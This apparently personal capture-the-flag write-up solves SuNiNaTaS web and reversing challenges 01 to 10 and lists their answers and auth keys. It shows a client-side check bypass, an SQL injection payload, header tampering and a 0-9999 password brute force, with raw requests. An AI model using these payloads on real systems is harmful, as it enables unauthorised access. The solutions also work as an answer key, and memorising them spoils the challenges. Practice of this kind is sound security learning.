Hello Navi

Tech, Security & Personal Notes

challenges

Game 01

Code Analysis

<%
str = Request("str")

If not str = "" Then
    result = Replace(str,"a","aad")
    result = Replace(result,"i","in")
    result1 = Mid(result,2,2)
    result2 = Mid(result,4,6)
    result = result1 & result2
    Response.write result
    If result = "admin" Then
        pw = "????????"
    End if
End if
%>

  1. Replace(str, "a", "aad"): Replaces every ‘a’ with ‘aad’.
  2. Replace(result, "i", "in"): Replaces every ‘i’ with ‘in’.
  3. Mid(result, 2, 2): Extracts 2 characters starting at the 2nd character (Mid is 1-based).
  4. Mid(result, 4, 6): Extracts up to 6 characters starting at the 4th character.
  5. The goal is to make the final concatenated result equal to admin.

If we input ami:

  - a -> aad
  - i -> in
  - Intermediate result: aadmin
  - result1 = Mid("aadmin", 2, 2) = ad
  - result2 = Mid("aadmin", 4, 6) = min
  - result = ad + min = admin

ami
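
The transform above, ported to JavaScript as an added example (not the challenge's code): mid(), transform() and preimages() are names chosen here. It goes slightly beyond the walkthrough by checking every input of up to four characters drawn from the letters of admin, which confirms that ami is the only one that produces admin.

```javascript
// VBScript Mid(s, start, length): start is 1-based, and a length that runs
// past the end of the string is clamped instead of raising an error.
function mid(s, start, length) {
  return s.slice(start - 1, start - 1 + length);
}

// Same steps as the ASP page. VBScript Replace() is case-sensitive by default.
function transform(str) {
  if (str === "") return null; // the ASP page does nothing for empty input
  let result = str.split("a").join("aad");
  result = result.split("i").join("in");
  return mid(result, 2, 2) + mid(result, 4, 6);
}

// Enumerate every string of length 1..maxLen over `alphabet` and keep the
// ones that the transform maps to `target`.
function preimages(target, alphabet, maxLen) {
  const hits = [];
  let frontier = [""];
  for (let len = 1; len <= maxLen; len++) {
    const next = [];
    for (const prefix of frontier) {
      for (const ch of alphabet) {
        const candidate = prefix + ch;
        next.push(candidate);
        if (transform(candidate) === target) hits.push(candidate);
      }
    }
    frontier = next;
  }
  return hits;
}

console.log(transform("ami"));               // the walkthrough's input
console.log(transform("admin"));             // why typing the target directly fails
console.log(preimages("admin", "admin", 4)); // all inputs that reach the target
```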


Game 02

Analysis

<script>
  function chk_form() {
    var id = document.web02.id.value;
    var pw = document.web02.pw.value;
    if (id == pw) {
      alert("You can't join! Try again");
      document.web02.id.focus();
      document.web02.id.value = "";
      document.web02.pw.value = "";
    } else {
      document.web02.submit();
    }
  }
</script>
<!-- Hint : Join / id = pw -->
<!-- M@de by 2theT0P -->

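The script prevents the form from being submitted if the id is equal to the pw, but the check exists only in the browser. The hint explicitly states that for the Join challenge, we need id = pw, so the request has to reach the server without going through chk_form().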

Bypass

Intercept the request with a proxy (like Burp Suite or ZAProxy) or use the browser’s Network tab to replay a modified request.

id=admin&pw=admin


Game 03

http://suninatas.com/board/notice/write
1q2w3e4r5t6y7u8i9o0p


Game 04

Hint: Make your point to 50 & ‘SuNiNaTaS’

Tool: ZAProxy

Initial Request

POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ
Upgrade-Insecure-Requests: 1
Priority: u=0, i

total=0

Solution Steps

  1. Set fuzz location with numbers from 0 → 23
  2. Click plus in browser with the same cookie
  3. Receive alert: “I like the SuNiNaTaS browser!”
  4. Change User-Agent to include “SuNiNaTaS”:

     User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0
     Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ

     total=25

  5. Fuzz again until points reach 50 (avoid overflow)

Response

<td class="table_top">
<font size="2"><b>Auth key</b></font>
</td>
<td class="table_top">***********************</td>


Game 05

Concepts: JS Packer, JSObfuscator

Challenge Code

<input name="password" value="" style="width:180" />

<script>
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('g l=m o(\'0\',\'1\',\'2\',\'3\',\'4\',\'5\',\'6\',\'7\',\'8\',\'9\',\'a\',\'b\',\'c\',\'d\',\'e\',\'f\');p q(n){g h=\'\';g j=r;s(g i=t;i>0;){i-=4;g k=(n>>i)&u;v(!j||k!=0){j=w;h+=l[k]}}x(h==\'\'?\'0\':h)}',34,34,'||||||||||||||||var|result||start|digit|digitArray|new||Array|function|PASS|true|for|32|0xf|if|false|return'.split('|'),0,{}))
</script>

<script>
  function init() {
    document.frm.password.value = "";
    document.frm.password.focus();
  }
</script>

Deobfuscated Code

var digitArray = new Array(
  "0", "1", "2", "3", "4", "5", "6", "7",
  "8", "9", "a", "b", "c", "d", "e", "f",
);

function PASS(n) {
  var result = "";
  var start = true;
  for (var i = 32; i > 0; ) {
    i -= 4;
    var digit = (n >> i) & 0xf;
    if (!start || digit != 0) {
      start = false;
      result += digitArray[digit];
    }
  }
  return result == "" ? "0" : result;
}

Solution

Convert the hint using the PASS() function:

PASS(12342046413275659);
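
One caveat when reproducing this call outside a browser, shown as an added example (not code from the challenge): the literal is larger than Number.MAX_SAFE_INTEGER, so JavaScript rounds it to the nearest double before `>>` truncates it to 32 bits. A port to an arbitrary-precision integer type therefore produces a different last hex digit. passExact(), passAsBrowser() and explain() are names chosen here; PASS() is the deobfuscated function from above.

```javascript
const HEX = "0123456789abcdef";

// Deobfuscated PASS() from the page, unchanged in behaviour.
function PASS(n) {
  let result = "";
  let start = true;
  for (let i = 32; i > 0; ) {
    i -= 4;
    const digit = (n >> i) & 0xf; // >> first converts n to a signed 32-bit integer
    if (!start || digit !== 0) {
      start = false;
      result += HEX[digit];
    }
  }
  return result === "" ? "0" : result;
}

// What the browser computes: the decimal text becomes a double, then 32 bits.
function passAsBrowser(decimalString) {
  return PASS(Number(decimalString));
}

// What an arbitrary-precision port computes: low 32 bits of the exact value.
function passExact(decimalString) {
  return (BigInt(decimalString) & 0xffffffffn).toString(16);
}

// Side-by-side view of both results and of the value the double really holds.
function explain(decimalString) {
  const asDouble = Number(decimalString);
  return {
    safe: Number.isSafeInteger(asDouble),
    storedValue: BigInt(asDouble).toString(),
    browser: passAsBrowser(decimalString),
    exact: passExact(decimalString),
  };
}

console.log(explain("12342046413275659"));
```

The value the site expects is the one the browser computes, so check a port in another language against passAsBrowser() rather than against the exact arithmetic.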


Game 07

uBlock (browser addon), btw.

Refresh and click the button.

<input type="submit" value="YES" />
G0Od d@y


Game 06

Vulnerability: SQL Injection

Attack Vector

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '"&pwd&"'

Inject with 1' or '1' like '1:

select szPwd from T_Web13 where
nIdx = '3' and szPwd = '1' or '1' like '1'

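This bypasses the password check by making the condition always true: AND binds more tightly than OR, so the WHERE clause is evaluated as (nIdx = '3' and szPwd = '1') or ('1' like '1'), and the second operand holds for every row.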

Success Response

Congratulation!!
auth_key is suninatastopofworld!

Now, you can read this article.

Next challenge URL: http://suninatas.com/challenge/web06/view.asp?idx=3&num=3&passcode=wkdrnlwnd

Hint form:

<form method="post" name="KEY_HINT" action="Rome's First Emperor"></form>
Augustus


Game 08

Vulnerability: Brute Force

Hint: Login as ‘admin’ with password in range 0 ~ 9999

Tool: ZAProxy

Attack

Use fuzzing to brute force the password parameter from 0 to 9999.

POST http://suninatas.com/challenge/web08/web08.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web08/web08.asp
Cookie: ASPSESSIONIDQSBTDCST=FNDPAPJCJDFBJAAENDCKDGDK
Upgrade-Insecure-Requests: 1
Priority: u=0, i

id=admin&pw=$$
l3ruteforce P@ssword
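
The server-side control that stops this kind of sweep is a per-account failure limit. The sketch below is an added example, not the challenge site's code: createThrottle(), simulateSweep(), MAX_FAILURES, LOCK_MS and the PIN values are all assumptions chosen here. It replays the 0 to 9999 sweep against the limiter and counts how many guesses the server actually evaluates.

```javascript
const MAX_FAILURES = 5;          // assumed policy: lock after 5 consecutive failures
const LOCK_MS = 15 * 60 * 1000;  // assumed policy: 15 minute lock

function createThrottle() {
  const state = new Map(); // account id -> { failures, lockedUntil }
  return {
    // Returns "ok", "bad-credentials" or "locked".
    attempt(id, pw, checkPassword, now) {
      const s = state.get(id) || { failures: 0, lockedUntil: 0 };
      if (now < s.lockedUntil) return "locked"; // the guess is never evaluated
      if (checkPassword(id, pw)) {
        state.delete(id);
        return "ok";
      }
      s.failures += 1;
      if (s.failures >= MAX_FAILURES) {
        s.lockedUntil = now + LOCK_MS;
        s.failures = 0;
      }
      state.set(id, s);
      return "bad-credentials";
    },
  };
}

// Replays the sequential sweep against a constructed secret PIN, with every
// request arriving at the same instant (now = 0), as a fuzzer would send them.
function simulateSweep(secretPin) {
  const throttle = createThrottle();
  const check = (id, pw) => id === "admin" && pw === secretPin;
  let evaluated = 0, locked = 0, found = false;
  for (let pin = 0; pin <= 9999; pin++) {
    const outcome = throttle.attempt("admin", String(pin), check, 0);
    if (outcome === "locked") locked++; else evaluated++;
    if (outcome === "ok") { found = true; break; }
  }
  return { evaluated, locked, found };
}

console.log(simulateSweep("4821")); // constructed PIN in the middle of the range
console.log(simulateSweep("3"));    // constructed PIN inside the first few guesses
```

The second run shows the limit of the control: a secret that falls within the first few guesses is still found, so a lockout complements a larger password space and does not replace it.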


Game 09

Challenge: Reverse engineering a Windows executable

Step 1: Extract Archive

7z x SuNiNaTaS.zip

Step 2: Identify File

file Project1.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386, 8 sections

Step 3: Analyze with IDA

Run the executable in a virtual environment (Windows 10, VirtualBox).

The program displays an input box with two buttons.

Use IDA Pro and press Shift+F12 to view strings. Look for the “Congratulation!” message, then double-click to find cross-references.

Step 4: Find Password

From IDA disassembly:

CODE:00450388 ; ---------------------------------------------------------------------------
CODE:00450389 align 4
CODE:0045038C _str_913465 _strings <0FFFFFFFFh, 6, '913465'>
CODE:0045038C ; DATA XREF: _TForm1_Button1Click+1B↑o
CODE:0045039B align 4
CODE:0045039C ; const CHAR aSuninatas[]
CODE:0045039C aSuninatas db 'SuNiNaTaS',0 ; DATA XREF: _TForm1_Button1Click+45↑o
CODE:004503A6 align 4
CODE:004503A8 ; const CHAR aCongratulation[]
CODE:004503A8 aCongratulation db 'Congratulation!',0 ; DATA XREF: _TForm1_Button1Click+4A↑o


Game 10

Challenge: Reverse engineering a .NET Windows executable

Step 1: Extract and Identify

7z x reversing.zip
file reversing.exe

Output: PE32 executable for MS Windows 4.00 (GUI), Intel i386 Mono/.Net assembly, 3 sections

Step 2: Hex Analysis

From hex view, strings are readable in Unicode format:

2theT@P, Authkey: Did U use the Peid?, SuNiNaTaS, Try again!, explorer, http://suninatas.com, textBox1, button1, OK, label2, Made by 2theT0P, button2, QUIT, Form1, WindowsFormsApplication1, Properties, Resources

The program is based on WinForms.

Step 3: Decompile with dnSpyEx

Use dnSpyEx (run in Windows) and drag the file to decompile.

Decompiled Code

// WindowsFormsApplication1.Form1
// Token: 0x06000003 RID: 3 RVA: 0x00002068 File Offset: 0x00000268
private void button1_Click(object sender, EventArgs e)
{
    string text = "2theT@P";
    string text2 = "Authkey : Did U use the Peid?";
    if (this.textBox1.Text == text)
    {
        MessageBox.Show(text2, "SuNiNaTaS");
        this.textBox1.Text = "";
        return;
    }
    MessageBox.Show("Try again!", "SuNiNaTaS");
    this.textBox1.Text = "";
}